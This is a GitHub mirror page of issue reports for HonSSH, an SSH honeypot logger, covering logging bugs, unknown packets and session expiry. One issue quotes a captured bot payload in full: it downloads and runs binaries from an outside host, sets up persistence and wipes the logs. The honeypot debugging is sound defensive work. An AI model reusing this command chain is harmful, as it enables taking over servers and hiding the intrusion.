tnich / honssh Goto Github PK

View Code? Open in Web Editor NEW

372.0 372.0 73.0 412 KB

HonSSH is designed to log all SSH communications between a client and server.

Home Page: https://github.com/tnich/honssh

License: BSD 3-Clause "New" or "Revised" License

Python 97.33% Shell 2.67%

honssh's People

Contributors

Stargazers

Watchers

Forkers

jacobjacob necrose99 ohio813 safe3 digitalizedwarfare 0xa08ab242 lazyboyswag zombieninjapirate securextools fsero robputt cz-nic bifrozt savamarius ph0enixxx houcy olivierh59500 patanax chris1201 seccraft rosehgal gameover453 nfar krishnaprasad-p tonysan redux1 utoni mostafahussein muhammadraafatdawood cyber-a finid jdkullmann spiritux h0r57 zshell johnjohnsp1 expressdesert wsygoogol avaudioplayer expertasif 0thm4n3 milamber31337 ykankaya koncybernet hotelzululima neo4reo nelsnelson pacejj27 jluarter rajasaad7 morristech ro9ueadmin sgtpepperpt freeguy1 cert-cameroon littledoge tsarpaul crzsotona tfalvi zzzapzzz elijahhezekiah12 dazhix pu55yf3r bryanwills hartl3y94 cvlabsio bcp-infosec-repo ikpehlivan jxto13 0hex7 cyberguideme

honssh's Issues

SFTP Parsing

Allow attackers to manipulate files by SFTP (currently disabled)
Parse and log all activity.

ETA: ???

Original issue reported on code.google.com by [email protected] on 30 Mar 2014 at 5:34

SCP and SFTP don't work with WinSCP

To fix.

Original issue reported on code.google.com by [email protected] on 31 May 2014 at 8:37

File download working intermittently

What steps will reproduce the problem?
1. The attacker logs in and downloads a file.

What is the expected behavior?
All files that's downloaded to the honeypot are also downloaded by HonSSH

What do you see instead?
Only some files are downloaded, others are not.

What version of the product are you using?
56dfab7e24f1

On what operating system?
OpenBSD 5.3/5.4

Please provide any additional information below.
This is the first time i've noticed this. Two files were downloaded to the 
honeypot today, the only difference i can see between the two download events 
is the port the attacker connects to on the malware hosting server.
HTTP on port 6666 in this case. If this is the case its not consistent either 
as HonSSH has managed to do this before.

Adding log, adv-log and tty. Enjoy! :)

Original issue reported on code.google.com by [email protected] on 26 Mar 2014 at 10:32

Attachments:

202.146.217.84.tar.gz

Log port scans in daily logs

As discussed

Original issue reported on code.google.com by [email protected] on 16 Aug 2014 at 1:29

Exec-Sessions do not get logged

Another discovery:

exec-Sessions (message 98 with data = exec) do not get logged. Only 
pty-sessions (message 98 with data = pty-req).

Also, message 98 with data = exec should directly logged to the tty-log as a 
user input.

Here is a message-example of a DDOS-Bot which attacked my honeypot:

2014-03-01 10:35:01+0100 [HonsshServerTransport,3,116.27.9.0] SERVER: 
MessageNum: 98 Encrypted 
'\x00\x00\x00\x00\x00\x00\x00\x04exec\x01\x00\x00\x10\x88/etc/init.d/iptables 
stop\necho "nameserver 8.8.8.8" >> /etc/resolv.conf\necho "nameserver 8.8.4.4" 
>> /etc/resolv.conf\nyum -y install wget\nchmod 7777 / etc\nkillall -9 
.IptabLes\nkillall -9 nfsd4\nkillall -9 profild.key\ncd /etc;rm -rf dir 
fake.cfg\nkillall -9 nfsd\nkillall -9 DDosl\nkillall -9 lengchao32\nkillall -9 
b26\nkillall -9 Bill\nkillall -9 n26\nkillall -9 1\nkillall -9 
codelove\nkillall -9 32\nkillall -9 m32\nkillall -9 m64\nkillall -9 64\nkillall 
-9 83BOT \nkillall -9 82BOT\nkillall -9 dos64\nkillall -9 dos32\nkillall -9 
new6\nkillall -9 new4\nkillall -9 node24\nkillall -9 mimi\nkillall -9 
nodeJR-1\nkillall -9 freeBSD\nkillall -9 ksapdd\nkillall -9 kysapdd\nkillall -9 
sksapdd\nkillall -9 xsw \nkillall -9 syslogd\nkillall -9 skysapdd\nkillall -9 
cupsddd\nkillall -9 ksapd\nkillall -9 atddd\nkillall -9 xfsdxd\ncd /etc;chattr 
-i cupsdd\ncd /root; chmod 7777 / etc\nkillall -9 minerd\nkillall -9 0\nkillall 
-9 joudckfr\nkillall -9 www\nkillall -9 log\nkillall -9 .IptabLex\nkillall -9 
.Mm2\nkillall -9 acpid\nkillall -9 m64 \nkillall -9 ./QQ\nkillall -9 
QQ\nkillall -9 g3\nkillall -9 2\nkillall -9 3\nkillall -9 pm\nkillall -9 
qweasd\nkillall -9 tangtang\nkillall -9 imap-login\nkillall -9 cupsdd\nkillall 
-9 xudp\nkillall -9 txma\nkillall -9 mrdos64.b00\nkillall -9 
mrdos32.b00\nkillall -9 kkpklp\nkillall -9 kiilp\nkillall -9 xin1\nkillall -9 
jibateng\ncd /root;rm -rf dir nohup.out\ncd /etc;rm -rf dir cupsddd\ncd /etc;rm 
-rf dir atddd\ncd /etc;rm -rf dir ksapdd\ncd /etc;rm -rf dir kysapdd\ncd 
/etc;rm -rf dir sksapdd\ncd /etc;rm -rf dir skysapdd\ncd /etc;rm -rf dir 
xfsdxd\ncd /etc;rm -rf dir fake.cfg\ncd /etc;rm -rf dir cupsddd.*\ncd /etc;rm 
-rf dir atddd.*\ncd /etc;rm -rf dir ksapdd.*\ncd /etc;rm -rf dir kysapdd.*\ncd 
/etc;rm -rf dir sksapdd.*\ncd /etc;rm -rf dir skysapdd.*\ncd /etc;rm -rf dir 
xfsdxd.*\ncd /etc;rm -rf dir cupsdd\ncd /etc;rm -rf dir atdd\ncd /etc;rm -rf 
dir ksapd\ncd /etc;rm -rf dir kysapd\ncd /etc;rm -rf dir sksapd\ncd /etc;rm -rf 
dir skysapd\ncd /etc;rm -rf dir xfsdx\ncd /etc;rm -rf dir fake.cfg\ncd /etc;rm 
-rf dir cupsdd.*\ncd /etc;rm -rf dir atdd.*\ncd /etc;rm -rf dir ksapd.*\ncd 
/etc;rm -rf dir kysapd.*\ncd /etc;rm -rf dir sksapd.*\ncd /etc;rm -rf dir 
skysapd.*\ncd /etc;rm -rf dir xfsdx.*\ncd /var/spool/cron; rm -rf dir 
root.*\ncd /var/spool/cron; rm -rf dir root\ncd /var/spool/cron/crontabs; rm 
-rf dir root.*\ncd /var/spool/cron/crontabs; rm -rf dir root\ncd 
/var/spool/cron ;wget http://122.224.34.75:8182/root\ncd 
/var/spool/cron/crontabs ;wget http://122.224.34.75:8182/root\ncd /etc;wget 
http://122.224.34.75:8182/cupsdd\ncd /etc;wget 
http://122.224.34.75:8182/ksapdd\ncd /etc;wget 
http://122.224.34.75:8182/kysapdd\ncd /etc;wget 
http://122.224.34.75:8182/atddd\ncd /etc;wget 
http://122.224.34.75:8182/skysapdd\ncd /etc;wget 
http://122.224.34.75:8182/sksapdd\ncd /etc;wget 
http://122.224.34.75:8182/xfsdxd\ncd /etc;chmod 7777 xfsdxd\ncd /etc;chmod 7777 
atddd\ncd /etc;chmod 7777 cupsdd\ncd /etc;chmod 7777 ksapdd\ncd /etc;chmod 7777 
kysapdd\ncd /etc;chmod 7777 skysapdd\ncd /etc;chmod 7777 sksapdd\nnohup 
/etc/xfsdxd > /dev/null 2>&1&\nnohup /etc/cupsdd > /dev/null 2>&1&\nnohup 
/etc/ksapdd > /dev/null 2>&1&\nnohup /etc/kysapdd > /dev/null 2>&1&\nnohup 
/etc/atddd > /dev/null 2>&1&\nnohup /etc/skysapdd > /dev/null 2>&1&\nnohup 
/etc/sksapdd > /dev/null 2>&1&\necho "cd /etc;./ksapdd" >> /etc/rc.local \necho 
"cd /etc;./kysapdd" >> /etc/rc.local \necho "cd /etc;./atddd" >> /etc/rc.local 
\necho "cd /etc;./ksapdd" >> /etc/rc.local \necho "cd /etc;./skysapdd" >> 
/etc/rc.local \necho "cd /etc;./xfsdxd" >> /etc/rc.local \necho "unset 
MAILCHECK" >> /etc/profile\ncd /etc;chattr +i cupsdd\nrm -rf 
/root/.bash_history\ntouch /root/.bash_history\nhistory -r\ncd /var/log > dmesg 
\ncd /var/log > auth.log \ncd /var/log > alternatives.log \ncd /var/log > 
boot.log \ncd /var/log > btmp \ncd /var/log > cron \ncd /var/log > cups \ncd 
/var/log > daemon.log \ncd /var/log > dpkg.log \ncd /var/log > faillog \ncd 
/var/log > kern.log \ncd /var/log > lastlog\ncd /var/log > maillog \ncd 
/var/log > user.log \ncd /var/log > Xorg.x.log \ncd /var/log > anaconda.log 
\ncd /var/log > yum.log \ncd /var/log > secure\ncd /var/log > wtmp\ncd /var/log 
> utmp \ncd /var/log > messages\ncd /var/log > spooler\ncd /var/log > 
sudolog\ncd /var/log > aculog\ncd /var/log > access-log\ncd /root > 
.bash_history\nhistory -c\necho 
\xcc\xe1\xca\xbe----\xc3\xfc\xc1\xee\xd6\xb4\xd0\xd0\xb3\xc9\xb9\xa6\nsleep 600'

Original issue reported on code.google.com by [email protected] on 1 Mar 2014 at 1:10

Inactive sessions are not expired.

Hi Peg.

Not sure if this is a pure HonSSH issue or not, but i'd be grateful if you
would have a look at it.

After an attack it looks like HonSSH keeps the sessions open:
tcp          0      0  88.222.55.22.22        117.21.191.209.4454    ESTABLISHED
tcp          0      0  88.222.55.22.22        117.21.191.209.2349    ESTABLISHED
tcp          0      0  88.222.55.22.22        117.21.191.208.4575    ESTABLISHED
tcp          0      0  88.222.55.22.22        61.174.51.218.3577     ESTABLISHED
tcp          0      0  88.222.55.22.22        61.174.51.217.1498     ESTABLISHED
tcp          0      0  88.222.55.22.22        115.239.248.59.2490    ESTABLISHED
tcp          0      0  88.222.55.22.22        115.239.248.59.1456    ESTABLISHED
tcp          0      0  88.222.55.22.22        115.239.248.59.2814    ESTABLISHED
tcp          0      0  *.22                   *.*                    LISTEN

At first i thought it was the attacker(s) that kept the sessions open, but 
tcpdump
does not show any packets being sent or received.

I also tried to configuring my firewall to be more aggressive in expiring 
inactive
sessions.

I've only found two workarounds for this issue
1) restart HonSSH 
2) reboot the router


What version of the product are you using?
b9880b4e367b

On what operating system?
OpenBSD 5.3 amd64
OpenBSD 5.4 amd64

Please provide any additional information below.
The issue is intermittent. HonSSH (and the firewall) is able to expire most 
sessions
so it might be an issue with the client side(?). I've attached logs and 
adv-logs for
you, hopefully you can make some sense of this.


Cheers,
Black September.

Original issue reported on code.google.com by [email protected] on 15 Mar 2014 at 10:37

Attachments:

expire.sessions.tar.gz

Commands passed on command line to ssh do not show up in the logs.

What steps will reproduce the problem?
1.  Start honssh
2.  SSH in with command on command line
3.  Get h4x0r3d without logs of it

What is the expected output? What do you see instead?
The command.  Just a log

What version of the product are you using? On what operating system?
The version in the repos from 28Feb

Please provide any additional information below.
The following command executes on the honeypot, but there is no log of it:

ssh -p 2222 root@honeypot 'echo foo > bar'

Original issue reported on code.google.com by [email protected] on 2 Mar 2014 at 6:48

Merged into: #9

Email not sent after EXEC session

No email notification of an attack once an EXEC session has finished.

Original issue reported on code.google.com by [email protected] on 29 Apr 2014 at 9:14

Check session termination

Ref Are.

Original issue reported on code.google.com by [email protected] on 14 Sep 2014 at 2:00

CLIENT 100

What steps will reproduce the problem?
Not sure what causes this issue or if its working as intended, but i've noticed 
this showing up in a lot of session logs lately.

Unknown SSH Packet detected - Please raise a HonSSH issue on google code with 
the details: CLIENT 100 - '\x00\x00\x01\x00'

What version of the product are you using? On what operating system?
b9880b4e367b

Original issue reported on code.google.com by [email protected] on 10 Mar 2014 at 10:34

Unknown SSH-Packages 2,20,21,30,31,32,33

Got some unknown SSH-Packages tonight:

Unknown SSH Packet detected - Please raise a HonSSH issue on google code with 
the details: 2 - 
'\x00\x00\x00\xb0\x8d6\xa9\x91\xd5\xd8\x15\xbfP\x1a\xab\x10\x01\xaaR\xf5\x88\xb1
\xb6\x11\xce\x8d\xbe\x12\xcb\x03\'/\xe7R;\xca\x8e\xbcf\x9a\xfa\xb9\xdf\x84G%\x83
\x14\x16\x9c\x95\xdf\xae\'\xdf\x15\x99\xc6\x0f]\xc6.\xf2q\xcd!\'\x12ju\xea*~\x95
\xf0\xfe\xe0\x9c\xacm\xe5\x08(\t\xd6\x1al&\xef\xa2\x120\x01\xe0\x1c\xf4\xc8k3\'\
xfe\x82br\x95!I\xcb\xe7\x99\xc5%L\xb9.\xc4\xf2"q\xb0\xea+\xc4F\xcf\xef\xb3\x1b\x
e9\x0fTe\xc5\xac\xdeH\xe2\x122\x08+\xbd5\xf3c7\x05\x96Hk\xe9|\xf6\x9a\x0fx\x1b\x
94\ta\x0eD\xb4\x97\xc1\xd8\xbf}i\xa1E1\xbf\xb0\xc2\x8fe\xa6\xc6\x19'

Unknown SSH Packet detected - Please raise a HonSSH issue on google code with 
the details: 20 - 
'7\xee\xd5yVn\x8cD\xf9\xb6\xe0\x8b\xf5\xec[\xb5\x00\x00\x00\x9adiffie-hellman-gr
oup-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sh
a1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1\x00\x00\x00\x0fssh-rsa
,ssh-dss\x00\x00\x00\x9faes256-ctr,aes256-cbc,[email protected],aes192
-ctr,aes192-cbc,aes128-ctr,aes128-cbc,blowfish-ctr,blowfish-cbc,3des-ctr,3des-cb
c,arcfour256,arcfour128\x00\x00\x00\x9faes256-ctr,aes256-cbc,rijndael-cbc@lysato
r.liu.se,aes192-ctr,aes192-cbc,aes128-ctr,aes128-cbc,blowfish-ctr,blowfish-cbc,3
des-ctr,3des-cbc,arcfour256,arcfour128\x00\x00\x00-hmac-sha2-256,hmac-sha1,hmac-
sha1-96,hmac-md5\x00\x00\x00-hmac-sha2-256,hmac-sha1,hmac-sha1-96,hmac-md5\x00\x
00\x00\x1anone,zlib,[email protected]\x00\x00\x00\x1anone,zlib,[email protected]\x
00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'

Unknown SSH Packet detected - Please raise a HonSSH issue on google code with 
the details: 20 - 
'\xf6`\xb8\xec\xc2\xa7\x854\x91\xa3\xd2\xfb\x07\\\xbc\x9b\x00\x00\x00\xb7ecdh-sh
a2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-
sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hel
lman-group1-sha1\x00\x00\x00#ssh-rsa,ssh-dss,ecdsa-sha2-nistp256\x00\x00\x00\x9d
aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowf
ish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,[email protected]\x0
0\x00\x00\x9daes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3
des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysa
tor.liu.se\x00\x00\x00\xa7hmac-md5,hmac-sha1,[email protected],hmac-sha2-256,h
mac-sha2-256-96,hmac-sha2-512,hmac-sha2-512-96,hmac-ripemd160,hmac-ripemd160@ope
nssh.com,hmac-sha1-96,hmac-md5-96\x00\x00\x00\xa7hmac-md5,hmac-sha1,umac-64@open
ssh.com,hmac-sha2-256,hmac-sha2-256-96,hmac-sha2-512,hmac-sha2-512-96,hmac-ripem
d160,[email protected],hmac-sha1-96,hmac-md5-96\x00\x00\x00\x15none,zli
[email protected]\x00\x00\x00\x15none,[email protected]\x00\x00\x00\x00\x00\x00\x00\x
00\x00\x00\x00\x00\x00'

Unknown SSH Packet detected - Please raise a HonSSH issue on google code with 
the details: 30 - '\x00\x00\x10\x00'

Unknown SSH Packet detected - Please raise a HonSSH issue on google code with 
the details: 31 - "\x00\x00\x02\x01\x00\xf5\xd3\x84\x9d 
\x92\xfdB{N\xbd\x83\x8e\xa4\x83\x03\x97\xa5_\x80\xb6Dbc 
\xdb\xbeQ\xe8\xf6>\xd8\x81H\xd7\x87\xc9N~g\xe4\xf3\x93\xf2lV^\x19\x92\xb0\xcf\xf
8\xa4z\x9549F*M\x0f\xfaWc\xef`\xff\x90\x8f\x8e\xe6\xc4\xf6\xef\x9f2\xb9\xbaP\xf0
\x1a\xd5o\xe7\xeb\xe9\x08v\xa5\xcfa\x81:J\xd4\xba~\xc0pC\x03\xc9\xbf\x88}6\xab\x
bdl*\xa9T_\xc2&22\x92~s\x10`\xf5\xc7\x01\xc9m\xc3@\x16cm\xf48\xce0\x977\x15\xf1!
\xd7g\xcf\xb9\x8b]\t\xae{\x86\xfa6\xa0Q\xad<)A\xa2\x95\xa6\x8e/X:V\xbci\x91>\xc9
\xd2Z\xbe\xf4\xfd\xf1\xe3\x1e\xde\x82z\x02b\r\xb0X\xb9\xf0A\xda\x05\x1c\x8c\x0f\
x13\xb12\xc1|\xeb\x89?\xa7\xc4\xcd\x8d\x8f\xee\xbd\x82\xc5\xf9\x12\x0c\xb2!\xb8\
xe8\x8c_\xe4\xdc\x17\xca\x02\nST\x84\xc9,}K\xeei\xc7p>\x1f\xa9\xa6R\xd4D\xc8\x00
e4,n\xc0\xfa\xc2<$\xde$n=\xeer\xca\x8b\xc8\xbe\xcc\xda\xde+6w\x1e\xfc\xc3PU\x82h
\xf55*\xe5?/q\xdbb$\x9a\xd9\xacO\xab\xddm\xfb\t\x9cl\xff\x8c\x05\xbd\xea\x89C\x9
0\xf9\x86\x0f\x01\x1c\xca\x04m\xfe\xb2\xf6\xef\x81\tNy\x80\xbeRgBpm\x1f=\xb9 
\xdb\x10t\t)\x1b\xb4\xc1\x1f\x9a}\xcb\xfa\xf2m\x80\x8eo\x9f\xe66\xb2k\x93\x9d\xe
4\x19\x12\x9e\x86\xb1\xe62\xc6\x0e\xc2;e\xc8\x15r<]\x86\x1a\xf0h\xfd\n\xc8\xb3\x
7fL\x06\xec\xbd\\\xb2\xef\x06\x9c\xa8\xda\xac\\\xbdg\xc6\x18*e\xfe\xd6V\xd0\xdf\
xbb\xb8\xa40\xb1\xdb\xac{\xd60;\xec\x8d\xe0x\xfei\xf4C\xa7\xbc\x811\xa2\x84\xd2]
\xc2\x84O\tb@\xbf\xc6\x1bb\xe9\x1a\x87\x80)\x87e\x9b\x88L\tLht\x1d)\xaa\\\xa1\x9
b\x94W\xe1\xf9\xdfa\xc7\xdb\xbb\x13\xa6\x1ay\xe4g\x0b\x08`'\xf2\r\xa2\xafO[\x02\
x07%\xf8\x82\x87&7\x9fB\x91x\x92j$Kj\x0f\x00\x00\x00\x01\x05"

Unknown SSH Packet detected - Please raise a HonSSH issue on google code with 
the details: 32 - 
'\x00\x00\x02\x01\x00\xcc\xad\xaf(\xa7\xe8\xbbV4\xe4N\xd3\x15\xdfsG,\x04\x01\xc1
\xf3y\xcd\x9b\xf4m\xe8S\x03\xac\x9c!/\xe89\xe1\xcc\x86\x0fj\xbe\x04\x0c\xb6\n\x8
7\xc9\xf1<P[\xd1\x07L\xce\xc1_\x18\x0bO\xc8p\t\x9c\x99&~\xa8*\x9dG\x8aa\xe9\xa7%
gI\x9fMt\xbf\xb8QP\xab\\\xbf\x0eD\x91a0\xad\xee\xe6\xf19\xa5E\xc3\xb7H\xfd`o>^\x
02\xf0\x92G\xe2:\x19\xeb\xd6\xc2\x1b\xfd\xaa\xa2\xb8\x85\xa3\xce\xda 
\xf9oI\x02Ne\x8b\xfe\x16\x97.\xe6\xc4\xfb\xd8\x81\xdf\xb0\xb2`\\\xd8\xf28\x14\xe
5\n\x14\xe4LZk\xaa`\xb6E\xbc\xa0Q\x95\rgSl"\x80\x86(\xfcK\xb7b\xccD\xf3\r#\xbaV\
x1b\xe0\nx{\xc6nmH\x02b\x9f\xe4\xba\xaa\x05\xae\xd0\xca 
\x9d\xcd\xc5\x84\xfc\xa9\n??\xce\x1f\x8c\xc5\x1d\x90\x8e\x88g^Q\x99\x12\x04L\x98
\xfbY=\xb4|U\xd9\xf9\x80\x99\xe4\x1d\xcaq\x98\xa4\xcc\xbf%\x13\x03\t\x96;\xb7\xf
0\xf5k#u\xb5^\xc7\xc1\x94\x84\xb8\xf2\xb0\xbd\xd4jl1\xear\xef<\xb3\xcc\x0b\n\x91
\xb3\xbf\xe7*cD*\x16\xb8\x913\x9d=*\xb4.\xb0\xe1\xceI[\x80\xbd\rZ\xe53\x92\xdb\x
d0\xf6\xec\xb0\xfa1\x0b\n\x8b\xfa\xee<K\xf3\x98\xfd\x90\xfb\x8a\xd8u\xa5\xee3g\x
14\xa7\x8f\xad\xf1\xe0\x89Y\x8eG\xe9\xc7\x1f\x14\x92\xcc\xd5\x95\x90\x9e\x06Wy\x
07\x1e\x95\r\t\x0c\xb3\r\x7f\xb4\xa5\xe0\xc9\xee,q\x98\x1d}@\xe24\xac\x8d\x7f@-6
\x17\xdc\x8b\xad\xe0\xe3\xf2T\xa9b\xc3\x82\xee\x1c\xd7\xcdD\xc1dn\xad\x10\x15\xb
02c\x1aR\x97\x0e\xad\x82\x9b\xb1r\xb9\xdd\xce\x86\xd5\xf1\xdd\r\x07\x9f\xd3v\x89
\x1a\xac\xa0d\x01}\'\x95\x93\x03\t[N\x94U\xc6!\xf5\xd2y\x92:8*[\x06\xf2M\xd3<k}\
xfb\xdc\x801\xa1 
\xd6\x99\x03\xe1\xf2\xf3wYA\xedS\\\xb7m\x060\xe2\xa3M\x04\xdb\xc4\xa1\x00UZ%;\xd
ejy\x888_5-'

Unknown SSH Packet detected - Please raise a HonSSH issue on google code with 
the details: 33 - 
'\x00\x00\x01\x17\x00\x00\x00\x07ssh-rsa\x00\x00\x00\x03\x01\x00\x01\x00\x00\x01
\x01\x00\xb7\xfd}p\xe5j\xba-I\xdcX\xa3\xd8\x8a\xaa\xe4\xc1Z\xcf\xab{\xce\xe3r\xd
6\x88\x128\xd5\x8f\xa9\xd9\x12\x8a!z\xec\xd0\xaa\xf2\x00\x08\xa7\x911r\xe4R\xee\
xa4\xcd\xe5f\xe0\xde\xf6\xc7]\xd7(\x14D8\x86\xb6\xe1\xec\xca\xd3\xd1\xcd\'xu%Q\x
afF\x10\xf6\x1a\x12\xdb\xbbVw\xc9\xce\x93I\xf9^\xbfN\x95\x11>`V\xdb\x04a\x18Uw%I
\x11\x84\x141V2\x13Y\xe5)\xa9G\xfe\x88g@*\x96\x9cs\xdf\x03\xca\x02\xba\xd4\x19{\
xfb\xda\x9d\xbb~\x16\x19\xa7\x04\xc2\xe62>\x08\xc4L\xe8\x11x\xf0GT\x9c\xdd\x9c\x
f5~\r\x00(c\xd1\x1f\x07\xf0d\x9e\x04e\xfc\x94\xb2\xca\x89A\xf1$N\t\xbd\xa6\x1e\x
88 
\xdf3v_\x8d\xf85cs\xaf\xc1\xc3J3\x1b\xc1\xb0//>\xd7!\xed\xaf\xc5\xb3?\xed\xf6\x0
f\xe0&\xa3E\x0cI\xc5}Y\xb47\xa3\xa2C:\x7f\x0fU,\x1b\xe9\xad@\x07RDG\xaf}Z\xda[\x
cd\x92\x18\xa1\xb7\x00\x00\x02\x01\x00\xc9 
\xa6D\xb3\x8a\xd4\xc4Bx\xc5"f\x8d\x82\x95\xb4\xd5\xfe&R\xed\xa2\x00:O\x9c\xed\xc
5pz\x93\xe9\xdev\xf9\xcd\xe3\x91\x1f\xf7}\xb3\xf6\x07a\x19\xa3\xef\xe1\xf5\x8e\x
c5\r\x079a\x83\xe5\x95v\xf9+]\xd2\x9b-N\xed\x9a\x98_\x96f\xc7\x9f\xd8l3\xd8\x07 
i\xd6w3Z\xc8\x8d\xdc\xe9\xd2\xeb\x8d\x97!\x80\x1d\xa5\x8e\'\x06\xe7\xad\xaenC\xf
f\xec\x8b\x8dv)x/\xe0\xef\xab\x9e\xdb\x18\xc0\x93X!w\xc5\xb7p\x84\\\x12\xd0\x97\
x9d\x06Q\x80\xf8+\xcb\xfd\x9f\xeb\xd7\x97\'\x9f\xaf\xe5\xd0!\x0b\xb6\xef\x18\xbe
\xe5\x12\x86\xcb\xd3\xffH\x8f\xbd\x8a\xb8\xbc\x13\x87Sd\xc3\xee\xd7l:\xab\xc6\xa
8\xbe\xa5:\x9e\x84[`1\xac"\x16\xe5\xe7U@\x93\x0b/\xe7\xdaz5E\x92\x96\x7f\xc6E+RP
\xbb%\xf7\xee\x17\x11\xca\xab\x9e\xba\xcb0\x1d=\xe3\x9c\xc7\xc7\xf9\x0fw\x9d\x02
\xff\x9a(\xef\xf4a3k\x1e:\xaa\x17\xe2\xaf\x04o\xdd\xf0\xffS\xc1\x85\xdd\xa6\xb9H
_\x14\t\xf4\x1d\x17\x9f\xc5\xe1\xa4kaM\xdci\xc16[w\xf3-\xa0\xfa\x8c\xbc)q}\x1fM$
U\x04N\xce\xd5\xa0\xda\x0b\xfc\xd7\x0e\xf7\xf7\xb6\'\xd2\xdaM]C\x0e[\xbe\xfe\xa4
@\x14Q\x80\xb9p\x95bD\xee\x18CI\xd9E\xa6\xd3^\xa6\xe5\xc16Y\xd0N\xf2\x0b&u\xd4\x
d9\xf5\x16\xab]\x96\xd3\xe4Z,\xa7\x8a\xdb\xefk\xab\x0e\xfek\xb5\xebR\xda~\x83\x8
b\xaeH\x94\xfe\x1f\xd6\xa6\xae\xaf\xd2-\xd8\xb9h,Sx\xdc\x0e\x19\xe3\xfc\xd7\\\x0
6\xc8\xc3\xdb\t\x1d\x9e\xe8W\xb1\xfc\r\xf1\xd7\x8cc?\x81\xa5\xac\xed\xd5\xb1\xc6
\xe9:\xec\xf3\x04\x94/\xd8\xb8\'k}\xd7e\x90\xed\xf6\xf6\xab\xbfQ\xce\x9c\x87\x9e
\x14q\xa6\xc6\xb9@\xcaP\xc2\xc8\xf7\x15\x18o\x1d\x9a=\x0e\x13\x0fIF\x8aut\xa2\xb
9\xa2\xf5g:5\xcd\xcf\x10\x84\x93P\xc4B\xd1n\xfc:b\x85\x17\xe3M:\xdc\xa8\x928\xd5
\xa8\x8bZ\xb0\xb1S\xbc\xafw\xf87\x00\x00\x01\x0f\x00\x00\x00\x07ssh-rsa\x00\x00\
x01\x00\x17H\x95\xf4\xe3{)\xa5@\xf1\xa6\x95\xa4\xbbY\xb6\x90\x88\xad\xe8\xfa\x7f
&\x1c\x92\x93\x8f\xf6\x8c\x88\x1a\x07\xd0!\x04~\xf9~\xed\x07\xfe\\@\xce[\xe9{Y\x
c5$\x0f9|\xddR 
\xbf\xbc\x08\x1a\xb0\xac\xa4\xc5\xf6\xe2\x00+r\x06\x05\x19i\xb9\xb6\xb6\xb1!K\x0
2\xa5\xa1\xe4\xea\t\xab\xcd\xae\n#\xfc\xe7\xf4\x11^\x88\xe6\x086Zc,\xbd\xff\xba;
FS\xb81\xa1\xb6\xc9\xc7\xd5\xf1\r\xf9+^\x023J\x93\xc5f\xcay/&\xe3\x96\xcb6\x80\x
9c\x1cqUFA\x0b2\x8d\x93\xcb\xeb\n\x18\xb3l\xf6 
\xbf\xd42_b\x8eI`/I`FCOZ\xfb\xb8\xda\x95\x10\x93M\xdd\x1c\xc4\xa9\x8e\xe7\xdd\xa
a\xa3\x9br\x82\x02i##\xacfX\x18:lj5\x1b\xedV}J\x9d\xa2\x0c.\xbe\xab\xed\x1ay\xbb
D]\x91\x8f\x99\x8ew\xbcc\x1c\x97Z\xc2L\x0fW\x15F\xd5\x01 
\xe5\x92\x89`\xa5\xce\x82\xeek@\xe2\xb5\x9bH(\x1c\xc4\xe1\x93\xf6\x8f'

Unknown SSH Packet detected - Please raise a HonSSH issue on google code with 
the details: 21 - ''

Original issue reported on code.google.com by [email protected] on 2 Mar 2014 at 10:46

Change wget capturing

wget ([^;&|\\]+)

Original issue reported on code.google.com by [email protected] on 25 May 2014 at 8:39

New message type 98

2014-03-03 07:25:14 - Incoming connection from: 61.174.51.200:2629 - 
SSH-2.0-libssh2_1.4.2
2014-03-03 07:25:14 - Failed login - Username:root Password:admin
2014-03-03 07:25:14 - Successful login - Username:root Password:123456
2014-03-03 07:25:16 - New message 98 type detected - Please raise a HonSSH 
issue on google code with the details: subsystem
2014-03-03 07:25:16 - RAW CLIENT-SERVER: '\x00\x00\x00\x05\x01\x00\x00\x00\x03'
2014-03-03 07:25:17 - Lost connection from: 61.174.51.200

Please let me know if I can provide any more details.

Original issue reported on code.google.com by [email protected] on 3 Mar 2014 at 12:38

Error removing IP address to HonSSH Interface: Error: an inet prefix is expected rather than "11.22.33.45/32"

What steps will reproduce the problem?
1.
In honssh.cfg, set advanced networking to 'enabled = true'

2.
Connect to the honeypot

3.
Execute 'w'. The IP addres thats shown will be that of the router, not that of 
the connecting client.

What is the expected output?
When executing 'w' its expected to see the IP address of the connecting client.

What do you see instead?
The IP address of the internal gateway.


What version of the product are you using?
61a65bf9d5f8

On what operating system?
Ubuntu 12.04 LTS

Please provide any additional information below.
I've noticed this error when attackers have connected and disconnected and was 
able to reproduce it with the following steps:

# -- Stopping HonSSH.
#
2014-05-16 19:09:06+0200 [-] Main loop terminated.
2014-05-16 19:09:06+0200 [-] Server Shut Down.

# -- Changing 'enabled = true' to 'enabled = false'
#
2014-05-16 19:09:10+0200 [-] Log opened.
2014-05-16 19:09:10+0200 [-] twistd 11.1.0 (/usr/bin/python 2.7.3) starting up.
2014-05-16 19:09:10+0200 [-] reactor class: 
twisted.internet.pollreactor.PollReactor.
2014-05-16 19:09:10+0200 [-] HonsshServerFactory starting on 22
2014-05-16 19:09:10+0200 [-] Starting factory 
<honssh.server.HonsshServerFactory instance at 0x2474f80>
2014-05-16 19:09:10+0200 [HonsshSlimClientTransport,client] 
SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.4
2014-05-16 19:09:10+0200 [HonsshSlimClientTransport,client] Disconnecting with 
error, code 10
    reason: user closed connection
2014-05-16 19:09:10+0200 [HonsshSlimClientTransport,client] connection lost
2014-05-16 19:09:10+0200 [HonsshSlimClientTransport,client] Stopping factory 
<honssh.client.HonsshSlimClientFactory instance at 0x2474f38>
2014-05-16 19:09:27+0200 [honssh.server.HonsshServerFactory] disabling 
diffie-hellman-group-exchange because we cannot find moduli file
2014-05-16 19:09:27+0200 [honssh.server.HonsshServerFactory] Advanced 
Networking disabled - Using client_addr
2014-05-16 19:09:27+0200 [honssh.server.HonsshServerFactory] Starting factory 
